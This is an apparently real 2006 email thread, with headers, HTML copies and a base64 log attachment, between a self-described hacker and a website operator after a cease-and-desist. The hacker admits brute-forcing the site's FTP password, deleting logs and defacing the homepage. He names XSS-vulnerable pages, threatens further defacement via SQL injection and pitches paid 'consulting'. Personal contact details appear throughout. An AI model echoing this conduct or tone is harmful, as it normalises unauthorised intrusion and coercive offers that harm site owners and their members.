> > > > > in Conclusion, show me the logs , or any kind of proof that
> > > > > indicate i hacked your server. I am offering my allegiance to HELPING you.
> > > > >
> > > > > Dont refuse.
> > > > >
> > > >
> > > >
> > >
> >
>
------=_Part_31339_21983036.1156082253761
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
<div>Hello Saeed,</div>
<div> </div>
<div>Just writing to let you know that I am waiting for my admin the send me the
log. Do you still want it?</div>
<div> </div>
<div>Regards,</div>
<div> </div>
<div>Andrew<br><br> </div>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a href="mailto:charade000@gmail.com">charade000@gmail.com</a>> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex;
BORDER-LEFT: #ccc 1px solid">
<div>Thanks, appreciate it.</div>
<div><span class="e" id="q_10cf9f91fa20e2ce_1"><br>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">JA
Synergy</b> <<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:jasynergy@gmail.com" target="_blank">jasynergy@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0pt 0pt 0pt 0.8ex;
BORDER-LEFT: rgb(204,204,204) 1px solid">
<div>
<div>Thanks for your help. I will try to fix the problems that you suggest. I
will contact my server admin for the log.<br><br> </div></div>
<div><span>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:charade000@gmail.com" target="_blank">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex;
BORDER-LEFT: rgb(204,204,204) 1px solid">
<div> Of course I wouldnt do it as a job, im doing this out of kindess to
help you. Im a hacker not a criminal. I don't have time to sit here and do
Penetration tests on your server, but i will point out certain things.
<br><br> But, if you needed someone to hire to administrate your servers, or a
"consultant" to spend his day running tests im more than happy, and you
know where to find me.<br><br>First of all, you have tons of directories vulnerable
to cross site scripting
<br>especially in the display_map.php<br> and demo/sendurl.php<br><br>-clean up
the coding on the /admin.php<br><b>Fatal error</b>: Call to undefined function:
gettext() in <b>/home/jaenergy/public_html/admin.php</b> on line
<b>26<br>Thats</b>:<b> how i was able to find out your user name was
jaenergy.<br><br>And if i spent more time im sure i can find more..<br><br>Just
curious though because i thought the admin of the website was a girl<br>
<a onclick="return top.js.OpenExtLink(window,event,this)"
href="http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=
86281236"
target="_blank">http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&
;friendid=86281236
</a><br>is saying that is her website. <br>And that she coded it herself, which is a
lie because i noticed it used pagekits.<br><span style="FONT-WEIGHT: bold"><br>And
btw, can you send me the proof that show me i wa sin the server
<br>Just curious.<br></span><span style="FONT-WEIGHT: bold"></span><br></b></div>
<div><span><br><br>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">JA
Synergy</b> <<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:jasynergy@gmail.com" target="_blank">jasynergy@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0pt 0pt 0pt 0.8ex;
BORDER-LEFT: rgb(204,204,204) 1px solid">
<div>
<div>Hello Saeed,</div>
<div> </div>
<div>Please explain what you can do to secure the site. Are you helping as a
hobby or as a job? Let's say if we are not looking in hiring, are you going to
continue hacking us? <br> </div>
<div>Andrew</div></div>
<div><span>
<div> </div>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:charade000@gmail.com" target="_blank">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex;
BORDER-LEFT: rgb(204,204,204) 1px solid">
<div>Dear Tillie,<br><br>First of all i would like to make it clear that i never
gained root to the server, nor had 300 attempts to penetrate your email system, I
gained access through your FTP port which was vulnerable to Brutus because of the
weak password. And as for the search, Im not impressed, you have me on your myspace
and could have *easily* got the information from there, and i could do the same.
<br> <br><br> I'd also like to inform you that when i did have
root( in the FTP that is), I had the oppurtunity to cause catastrophic damage, I
could have easily accessed the bank accounts of your members, and yours as well, You
should be thanking me that my ethics were against this, and in replacement the only
damage i did was deleting the logs, and replacing the
index.html<br><br> I wont pursue damage to hack your site, so you can be rest
assured on this. But, i am offering my services to assist you in securing your
website, because I can at the moment deface it again, through many other ways
including an SQL Injection.
<br><br> in Conclusion, show me the logs , or any kind of proof that indicate i
hacked your server. I am offering my allegiance to HELPING you.<br><br>Dont refuse.
</div></blockquote></div><br></span></div></blockquote></div>
<br></span></div></blockquote></div><br></span></div></blockquote></div><br></span><
/div></blockquote></div><br>
------=_Part_31339_21983036.1156082253761--
X-Gmail-Received: 0f94927fbfea8d737544174db075ab7cf7e0da68
Delivered-To: charade000@gmail.com
Received: by 10.70.63.4 with SMTP id l4cs117488wxa;
Sun, 20 Aug 2006 07:35:16 -0700 (PDT)
Received: by 10.67.29.12 with SMTP id g12mr2983512ugj;
Sun, 20 Aug 2006 07:35:14 -0700 (PDT)
Received: by 10.66.221.8 with HTTP; Sun, 20 Aug 2006 07:35:14 -0700 (PDT)
Message-ID: <9efd8e010608200735t38db00c3t9c4f8289987d53b0@mail.gmail.com>
Date: Sun, 20 Aug 2006 07:35:14 -0700
From: "JA Synergy" <jasynergy@gmail.com>
To: Charade <charade000@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <9efd8e010608200657m3e79f2g5524b2c75cd314d6@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_Part_31591_5882422.1156084514345"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
<9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
<42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
<9efd8e010608101402q1209b1dcqd6853ace2a7a61cd@mail.gmail.com>
<42cb2150608101424k718fa5e6q7b5b45cbd104c891@mail.gmail.com>
<9efd8e010608200657m3e79f2g5524b2c75cd314d6@mail.gmail.com>
------=_Part_31591_5882422.1156084514345
Content-Type: multipart/alternative;
boundary="----=_Part_31592_14515442.1156084514345"
------=_Part_31592_14515442.1156084514345
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
here you go
On 8/20/06, JA Synergy <jasynergy@gmail.com> wrote:
>
> Hello Saeed,
>
> Just writing to let you know that I am waiting for my admin the send me
> the log. Do you still want it?
>
> Regards,
>
> Andrew
>
>
> On 8/10/06, Charade <charade000@gmail.com> wrote:
> >
> > Thanks, appreciate it.
> >
> > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > >
> > > Thanks for your help. I will try to fix the problems that you
> > > suggest. I will contact my server admin for the log.
> > >
> > >
> > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > >
> > > > Of course I wouldnt do it as a job, im doing this out of kindess
> > > > to help you. Im a hacker not a criminal. I don't have time to sit here and
> > > > do Penetration tests on your server, but i will point out certain things.
> > > >
> > > > But, if you needed someone to hire to administrate your servers, or
> > > > a "consultant" to spend his day running tests im more than happy, and you
> > > > know where to find me.
> > > >
> > > > First of all, you have tons of directories vulnerable to cross site
> > > > scripting
> > > > especially in the display_map.php
> > > > and demo/sendurl.php
> > > >
> > > > -clean up the coding on the /admin.php
> > > > *Fatal error*: Call to undefined function: gettext() in *
> > > > /home/jaenergy/public_html/admin.php* on line *26
> > > > Thats*:* how i was able to find out your user name was jaenergy.
> > > >
> > > > And if i spent more time im sure i can find more..
> > > >
> > > > Just curious though because i thought the admin of the website was
> > > > a girl
> > > >
http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=86281236
> > > >
> > > > is saying that is her website.
> > > > And that she coded it herself, which is a lie because i noticed it
> > > > used pagekits.
> > > >
> > > > And btw, can you send me the proof that show me i wa sin the server
> > > > Just curious.
> > > >
> > > > *
> > > >
> > > >
> > > > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > > > >
> > > > > Hello Saeed,
> > > > >
> > > > > Please explain what you can do to secure the site. Are you
> > > > > helping as a hobby or as a job? Let's say if we are not looking in hiring,
> > > > > are you going to continue hacking us?
> > > > >
> > > > > Andrew
> > > > >
> > > > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > > > >
> > > > > > Dear Tillie,
> > > > > >
> > > > > > First of all i would like to make it clear that i never gained
> > > > > > root to the server, nor had 300 attempts to penetrate your email system,
I
> > > > > > gained access through your FTP port which was vulnerable to Brutus
because
> > > > > > of the weak password. And as for the search, Im not impressed, you have
me
> > > > > > on your myspace and could have *easily* got the information from there,
and
> > > > > > i could do the same.
> > > > > >
> > > > > >
> > > > > > I'd also like to inform you that when i did have root( in the
> > > > > > FTP that is), I had the oppurtunity to cause catastrophic damage, I
could
> > > > > > have easily accessed the bank accounts of your members, and yours as
well,
> > > > > > You should be thanking me that my ethics were against this, and in
> > > > > > replacement the only damage i did was deleting the logs, and replacing
the
> > > > > > index.html
> > > > > >
> > > > > > I wont pursue damage to hack your site, so you can be rest
> > > > > > assured on this. But, i am offering my services to assist you in
securing
> > > > > > your website, because I can at the moment deface it again, through many
> > > > > > other ways including an SQL Injection.
> > > > > >
> > > > > > in Conclusion, show me the logs , or any kind of proof that
> > > > > > indicate i hacked your server. I am offering my allegiance to HELPING
you.
> > > > > >
> > > > > > Dont refuse.
> > > > > >
> > > > >
> > > > >
> > > >
> > >
> >
>
------=_Part_31592_14515442.1156084514345
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
here you go <br><br>
<div><span class="gmail_quote">On 8/20/06, <b class="gmail_sendername">JA
Synergy</b> <<a href="mailto:jasynergy@gmail.com">jasynergy@gmail.com</a>>
wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex;
BORDER-LEFT: #ccc 1px solid">
<div>
<div>Hello Saeed,</div>
<div> </div>
<div>Just writing to let you know that I am waiting for my admin the send me the
log. Do you still want it?</div>
<div> </div>
<div>Regards,</div></div>
<div><span class="e" id="q_10d2bdf3edae1554_1">
<div> </div>
<div>Andrew<br><br> </div>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:charade000@gmail.com" target="_blank">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex;
BORDER-LEFT: #ccc 1px solid">
<div>Thanks, appreciate it.</div>
<div><span><br>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">JA
Synergy</b> <<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:jasynergy@gmail.com" target="_blank">jasynergy@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0pt 0pt 0pt 0.8ex;
BORDER-LEFT: rgb(204,204,204) 1px solid">
<div>
<div>Thanks for your help. I will try to fix the problems that you suggest. I
will contact my server admin for the log.<br><br> </div></div>
<div><span>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:charade000@gmail.com" target="_blank">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex;
BORDER-LEFT: rgb(204,204,204) 1px solid">
<div> Of course I wouldnt do it as a job, im doing this out of kindess to
help you. Im a hacker not a criminal. I don't have time to sit here and do
Penetration tests on your server, but i will point out certain things.
<br><br> But, if you needed someone to hire to administrate your servers, or a
"consultant" to spend his day running tests im more than happy, and you
know where to find me.<br><br>First of all, you have tons of directories vulnerable
to cross site scripting
<br>especially in the display_map.php<br> and demo/sendurl.php<br><br>-clean up
the coding on the /admin.php<br><b>Fatal error</b>: Call to undefined function:
gettext() in <b>/home/jaenergy/public_html/admin.php</b> on line
<b>26<br>Thats</b>:<b> how i was able to find out your user name was
jaenergy.<br><br>And if i spent more time im sure i can find more..<br><br>Just
curious though because i thought the admin of the website was a girl<br>
<a onclick="return top.js.OpenExtLink(window,event,this)"
href="http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=
86281236"
target="_blank">http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&
;friendid=86281236
</a><br>is saying that is her website. <br>And that she coded it herself, which is a
lie because i noticed it used pagekits.<br><span style="FONT-WEIGHT: bold"><br>And
btw, can you send me the proof that show me i wa sin the server
<br>Just curious.<br></span><span style="FONT-WEIGHT: bold"></span><br></b></div>
<div><span><br><br>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">JA
Synergy</b> <<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:jasynergy@gmail.com" target="_blank">jasynergy@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0pt 0pt 0pt 0.8ex;
BORDER-LEFT: rgb(204,204,204) 1px solid">
<div>
<div>Hello Saeed,</div>
<div> </div>
<div>Please explain what you can do to secure the site. Are you helping as a
hobby or as a job? Let's say if we are not looking in hiring, are you going to
continue hacking us? <br> </div>
<div>Andrew</div></div>
<div><span>
<div> </div>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:charade000@gmail.com" target="_blank">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex;
BORDER-LEFT: rgb(204,204,204) 1px solid">
<div>Dear Tillie,<br><br>First of all i would like to make it clear that i never
gained root to the server, nor had 300 attempts to penetrate your email system, I
gained access through your FTP port which was vulnerable to Brutus because of the
weak password. And as for the search, Im not impressed, you have me on your myspace
and could have *easily* got the information from there, and i could do the same.
<br> <br><br> I'd also like to inform you that when i did have
root( in the FTP that is), I had the oppurtunity to cause catastrophic damage, I
could have easily accessed the bank accounts of your members, and yours as well, You
should be thanking me that my ethics were against this, and in replacement the only
damage i did was deleting the logs, and replacing the
index.html<br><br> I wont pursue damage to hack your site, so you can be rest
assured on this. But, i am offering my services to assist you in securing your
website, because I can at the moment deface it again, through many other ways
including an SQL Injection.
<br><br> in Conclusion, show me the logs , or any kind of proof that indicate i
hacked your server. I am offering my allegiance to HELPING you.<br><br>Dont refuse.
</div></blockquote></div><br></span></div></blockquote></div>
<br></span></div></blockquote></div><br></span></div></blockquote></div><br></span><
/div></blockquote></div><br></span></div></blockquote></div><br>
------=_Part_31592_14515442.1156084514345--
------=_Part_31591_5882422.1156084514345
Content-Type: text/plain; name="ftphackattempts.txt"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="ftphackattempts.txt"
X-Attachment-Id: f_er3iu67a
QXVnICA4IDE1OjIwOjQ5IGFscGhhIHByb2Z0cGRbMzkyMl06IGFscGhhLmFscGhhcmVkLmNvbSAo
NzUuMjIuNzIuNDhbNzUuMjIuNzIuNDhdKSAtIFVTRVIgYWRtaW46IG5vIHN1Y2ggdXNlciBmb3Vu
ZCBmcm9tIDc1LjIyLjcyLjQ4IFs3NS4yMi43Mi40OF0gdG8gNjQuNzIuMTI3LjE5OToyMSANCkF1
ZyAgOCAxNToyMToxNSBhbHBoYSBwcm9mdHBkWzQwMjhdOiBhbHBoYS5hbHBoYXJlZC5jb20gKDc1
(.....)
NS4yMi43Mi40OF0pIC0gVVNFUiBqYWVuZXJneTogTG9naW4gc3VjY2Vzc2Z1bC4gDQpBdWcgIDgg
MjA6MTI6MjMgYWxwaGEgcHJvZnRwZFsxNDE3MV06IGFscGhhLmFscGhhcmVkLmNvbSAoNzUuMjIu
NzIuNDhbNzUuMjIuNzIuNDhdKSAtIFVTRVIgamFlbmVyZ3k6IExvZ2luIHN1Y2Nlc3NmdWwuIA0K
------=_Part_31591_5882422.1156084514345--
X-Gmail-Received: 49fb2b55bfdea8238081a4c8cb3d13ef3ca70f3c
Received: by 10.70.63.4 with HTTP; Sun, 20 Aug 2006 11:45:16 -0700 (PDT)
Message-ID: <42cb2150608201145g2b62ae1ex6facd9900ef9c6da@mail.gmail.com>
Date: Sun, 20 Aug 2006 11:45:16 -0700
From: Charade <charade000@gmail.com>
To: "JA Synergy" <jasynergy@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <9efd8e010608200657m3e79f2g5524b2c75cd314d6@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_30080_17320577.1156099516421"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
<9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
<42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
<9efd8e010608101402q1209b1dcqd6853ace2a7a61cd@mail.gmail.com>
<42cb2150608101424k718fa5e6q7b5b45cbd104c891@mail.gmail.com>
<9efd8e010608200657m3e79f2g5524b2c75cd314d6@mail.gmail.com>
Delivered-To: charade000@gmail.com
------=_Part_30080_17320577.1156099516421
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Yes, id still like to see the log. Hopefully your not going through too much
trouble acquiring it.
On 8/20/06, JA Synergy <jasynergy@gmail.com> wrote:
>
> Hello Saeed,
>
> Just writing to let you know that I am waiting for my admin the send me
> the log. Do you still want it?
>
> Regards,
>
> Andrew
>
>
> On 8/10/06, Charade <charade000@gmail.com> wrote:
> >
> > Thanks, appreciate it.
> >
> > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > >
> > > Thanks for your help. I will try to fix the problems that you
> > > suggest. I will contact my server admin for the log.
> > >
> > >
> > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > >
> > > > Of course I wouldnt do it as a job, im doing this out of kindess
> > > > to help you. Im a hacker not a criminal. I don't have time to sit here and
> > > > do Penetration tests on your server, but i will point out certain things.
> > > >
> > > > But, if you needed someone to hire to administrate your servers, or
> > > > a "consultant" to spend his day running tests im more than happy, and you
> > > > know where to find me.
> > > >
> > > > First of all, you have tons of directories vulnerable to cross site
> > > > scripting
> > > > especially in the display_map.php
> > > > and demo/sendurl.php
> > > >
> > > > -clean up the coding on the /admin.php
> > > > *Fatal error*: Call to undefined function: gettext() in *
> > > > /home/jaenergy/public_html/admin.php* on line *26
> > > > Thats*:* how i was able to find out your user name was jaenergy.
> > > >
> > > > And if i spent more time im sure i can find more..
> > > >
> > > > Just curious though because i thought the admin of the website was
> > > > a girl
> > > >
http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=86281236
> > > >
> > > > is saying that is her website.
> > > > And that she coded it herself, which is a lie because i noticed it
> > > > used pagekits.
> > > >
> > > > And btw, can you send me the proof that show me i wa sin the server
> > > > Just curious.
> > > >
> > > > *
> > > >
> > > >
> > > > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > > > >
> > > > > Hello Saeed,
> > > > >
> > > > > Please explain what you can do to secure the site. Are you
> > > > > helping as a hobby or as a job? Let's say if we are not looking in hiring,
> > > > > are you going to continue hacking us?
> > > > >
> > > > > Andrew
> > > > >
> > > > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > > > >
> > > > > > Dear Tillie,
> > > > > >
> > > > > > First of all i would like to make it clear that i never gained
> > > > > > root to the server, nor had 300 attempts to penetrate your email system,
I
> > > > > > gained access through your FTP port which was vulnerable to Brutus
because
> > > > > > of the weak password. And as for the search, Im not impressed, you have
me
> > > > > > on your myspace and could have *easily* got the information from there,
and
> > > > > > i could do the same.
> > > > > >
> > > > > >
> > > > > > I'd also like to inform you that when i did have root( in the
> > > > > > FTP that is), I had the oppurtunity to cause catastrophic damage, I
could
> > > > > > have easily accessed the bank accounts of your members, and yours as
well,
> > > > > > You should be thanking me that my ethics were against this, and in
> > > > > > replacement the only damage i did was deleting the logs, and replacing
the
> > > > > > index.html
> > > > > >
> > > > > > I wont pursue damage to hack your site, so you can be rest
> > > > > > assured on this. But, i am offering my services to assist you in
securing
> > > > > > your website, because I can at the moment deface it again, through many
> > > > > > other ways including an SQL Injection.
> > > > > >
> > > > > > in Conclusion, show me the logs , or any kind of proof that
> > > > > > indicate i hacked your server. I am offering my allegiance to HELPING
you.
> > > > > >
> > > > > > Dont refuse.
> > > > > >
> > > > >
> > > > >
> > > >
> > >
> >
>
------=_Part_30080_17320577.1156099516421
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Yes, id still like to see the log. Hopefully your not going through too much trouble
acquiring it.<br><br><div><span class="gmail_quote">On 8/20/06, <b
class="gmail_sendername">JA Synergy</b> <<a href="mailto:jasynergy@gmail.com">
jasynergy@gmail.com</a>> wrote:</span><blockquote class="gmail_quote"
style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex;
padding-left: 1ex;"><div><div>Hello Saeed,</div>
<div> </div>
<div>Just writing to let you know that I am waiting for my admin the send me the
log. Do you still want it?</div>
<div> </div>
<div>Regards,</div></div><div><span class="e" id="q_10d2bdf3e90e1554_1">
<div> </div>
<div>Andrew<br><br> </div>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a href="mailto:charade000@gmail.com" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0px 0px 0px 0.8ex; padding-left: 1ex;">
<div>Thanks, appreciate it.</div>
<div><span><br>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">JA
Synergy</b> <<a href="mailto:jasynergy@gmail.com" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">jasynergy@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
<div>
<div>Thanks for your help. I will try to fix the problems that you suggest. I
will contact my server admin for the log.<br><br> </div></div>
<div><span>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a href="mailto:charade000@gmail.com" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0px 0px 0px 0.8ex; padding-left: 1ex;">
<div> Of course I wouldnt do it as a job, im doing this out of kindess to
help you. Im a hacker not a criminal. I don't have time to sit here and do
Penetration tests on your server, but i will point out certain things.
<br><br> But, if you needed someone to hire to administrate your servers, or a
"consultant" to spend his day running tests im more than happy, and you
know where to find me.<br><br>First of all, you have tons of directories vulnerable
to cross site scripting
<br>especially in the display_map.php<br> and demo/sendurl.php<br><br>-clean up
the coding on the /admin.php<br><b>Fatal error</b>: Call to undefined function:
gettext() in <b>/home/jaenergy/public_html/admin.php</b> on line
<b>26<br>Thats</b>:<b> how i was able to find out your user name was
jaenergy.<br><br>And if i spent more time im sure i can find more..<br><br>Just
curious though because i thought the admin of the website was a girl<br>
<a
href="http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=
86281236" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">http://profile.myspace.com/index.cfm?fuseacti
on=user.viewprofile&friendid=86281236
</a><br>is saying that is her website. <br>And that she coded it herself, which is a
lie because i noticed it used pagekits.<br><span style="font-weight: bold;"><br>And
btw, can you send me the proof that show me i wa sin the server
<br>Just curious.<br></span><span style="font-weight: bold;"></span><br></b></div>
<div><span><br><br>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">JA
Synergy</b> <<a href="mailto:jasynergy@gmail.com" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">jasynergy@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
<div>
<div>Hello Saeed,</div>
<div> </div>
<div>Please explain what you can do to secure the site. Are you helping as a
hobby or as a job? Let's say if we are not looking in hiring, are you going to
continue hacking us? <br> </div>
<div>Andrew</div></div>
<div><span>
<div> </div>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a href="mailto:charade000@gmail.com" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0px 0px 0px 0.8ex; padding-left: 1ex;">
<div>Dear Tillie,<br><br>First of all i would like to make it clear that i never
gained root to the server, nor had 300 attempts to penetrate your email system, I
gained access through your FTP port which was vulnerable to Brutus because of the
weak password. And as for the search, Im not impressed, you have me on your myspace
and could have *easily* got the information from there, and i could do the same.
<br> <br><br> I'd also like to inform you that when i did have
root( in the FTP that is), I had the oppurtunity to cause catastrophic damage, I
could have easily accessed the bank accounts of your members, and yours as well, You
should be thanking me that my ethics were against this, and in replacement the only
damage i did was deleting the logs, and replacing the
index.html<br><br> I wont pursue damage to hack your site, so you can be rest
assured on this. But, i am offering my services to assist you in securing your
website, because I can at the moment deface it again, through many other ways
including an SQL Injection.
<br><br> in Conclusion, show me the logs , or any kind of proof that indicate i
hacked your server. I am offering my allegiance to HELPING you.<br><br>Dont refuse.
</div></blockquote></div><br></span></div></blockquote></div>
<br></span></div></blockquote></div><br></span></div></blockquote></div><br></span><
/div></blockquote></div><br>
</span></div></blockquote></div><br>
------=_Part_30080_17320577.1156099516421--
X-Gmail-Received: e9e9efa1fbcc78702bedaac5b808370c8417bc39
Delivered-To: charade000@gmail.com
Received: by 10.70.63.4 with SMTP id l4cs143803wxa;
Sun, 20 Aug 2006 20:15:51 -0700 (PDT)
Received: by 10.67.119.5 with SMTP id w5mr3314596ugm;
Sun, 20 Aug 2006 20:15:50 -0700 (PDT)
Received: by 10.66.221.8 with HTTP; Sun, 20 Aug 2006 20:15:50 -0700 (PDT)
Message-ID: <9efd8e010608202015w23c2fac5q8aa972ab3445b1f6@mail.gmail.com>
Date: Sun, 20 Aug 2006 22:15:50 -0500
From: "JA Synergy" <jasynergy@gmail.com>
To: Charade <charade000@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <42cb2150608201145g2b62ae1ex6facd9900ef9c6da@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_41690_10171641.1156130150838"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
<9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
<42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
<9efd8e010608101402q1209b1dcqd6853ace2a7a61cd@mail.gmail.com>
<42cb2150608101424k718fa5e6q7b5b45cbd104c891@mail.gmail.com>
<9efd8e010608200657m3e79f2g5524b2c75cd314d6@mail.gmail.com>
<42cb2150608201145g2b62ae1ex6facd9900ef9c6da@mail.gmail.com>
------=_Part_41690_10171641.1156130150838
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
I sent it to you already, did u get it?
On 8/20/06, Charade <charade000@gmail.com> wrote:
>
> Yes, id still like to see the log. Hopefully your not going through too
> much trouble acquiring it.
>
>
> On 8/20/06, JA Synergy < jasynergy@gmail.com> wrote:
> >
> > Hello Saeed,
> >
> > Just writing to let you know that I am waiting for my admin the send me
> > the log. Do you still want it?
> >
> > Regards,
> >
> > Andrew
> >
> >
> > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > >
> > > Thanks, appreciate it.
> > >
> > > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > > >
> > > > Thanks for your help. I will try to fix the problems that you
> > > > suggest. I will contact my server admin for the log.
> > > >
> > > >
> > > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > > >
> > > > > Of course I wouldnt do it as a job, im doing this out of kindess
> > > > > to help you. Im a hacker not a criminal. I don't have time to sit here and
> > > > > do Penetration tests on your server, but i will point out certain things.
> > > > >
> > > > > But, if you needed someone to hire to administrate your servers,
> > > > > or a "consultant" to spend his day running tests im more than happy, and
you
> > > > > know where to find me.
> > > > >
> > > > > First of all, you have tons of directories vulnerable to cross
> > > > > site scripting
> > > > > especially in the display_map.php
> > > > > and demo/sendurl.php
> > > > >
> > > > > -clean up the coding on the /admin.php
> > > > > *Fatal error*: Call to undefined function: gettext() in *
> > > > > /home/jaenergy/public_html/admin.php* on line *26
> > > > > Thats*:* how i was able to find out your user name was jaenergy.
> > > > >
> > > > > And if i spent more time im sure i can find more..
> > > > >
> > > > > Just curious though because i thought the admin of the website
> > > > > was a girl
> > > > >
http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=86281236
> > > > >
> > > > > is saying that is her website.
> > > > > And that she coded it herself, which is a lie because i noticed it
> > > > > used pagekits.
> > > > >
> > > > > And btw, can you send me the proof that show me i wa sin the
> > > > > server
> > > > > Just curious.
> > > > >
> > > > > *
> > > > >
> > > > >
> > > > > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > > > > >
> > > > > > Hello Saeed,
